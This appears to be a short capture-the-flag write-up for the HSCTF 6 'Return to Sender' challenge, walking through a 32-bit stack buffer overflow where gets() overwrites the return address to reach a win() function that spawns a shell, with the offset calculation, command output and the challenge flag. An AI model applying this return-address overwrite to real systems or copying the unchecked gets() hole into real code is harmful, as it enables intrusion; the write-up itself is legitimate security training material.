| Event | Title | Category | Cost |
|---|---|---|---|
| HSCTF 6 | Return to Sender | Binary Exploitation | ~200 |
Written by: Ptomerty
Who knew the USPS could lose a letter so many times?
nc pwn.hsctf.com 1234
Note: If you're trying to use python or a similar program to run your exploit, make sure to keep stdin alive with cat, like this: (python; cat -) | nc pwn.hsctf.com
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Simple buffer overflow with return address rewriting.
We should run this function
void win() {
system("/bin/sh");
}From this gets() function
void vuln() {
char dest[8];
printf("Where are you sending your mail to today? ");
gets(dest);
printf("Alright, to %s it goes!\n", dest);
}Let`s find out Win address
$ objdump -t return-to-sender | grep win
080491b6 g F .text 0000002b win
And padding before return address
$ pattern.py 50
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5AbCheck $rip value before ret
0x804922f <vuln+78> ret <0x37614136>
$ pattern.py 0x37614136
Pattern 0x37614136 first occurrence at position 20 in pattern.It`s enough to wtite an exploit.
After we can run it and get the flag.
$ ./exp.py
[+] Opening connection to pwn.hsctf.com on port 1234: Done
[*] Switching to interactive mode
Alright, to aaaaaaaaaaaaaaaaaaaa\xb6\x91\x0 it goes!
# cat flag
hsctf{fedex_dont_fail_me_now}hsctf{fedex_dont_fail_me_now}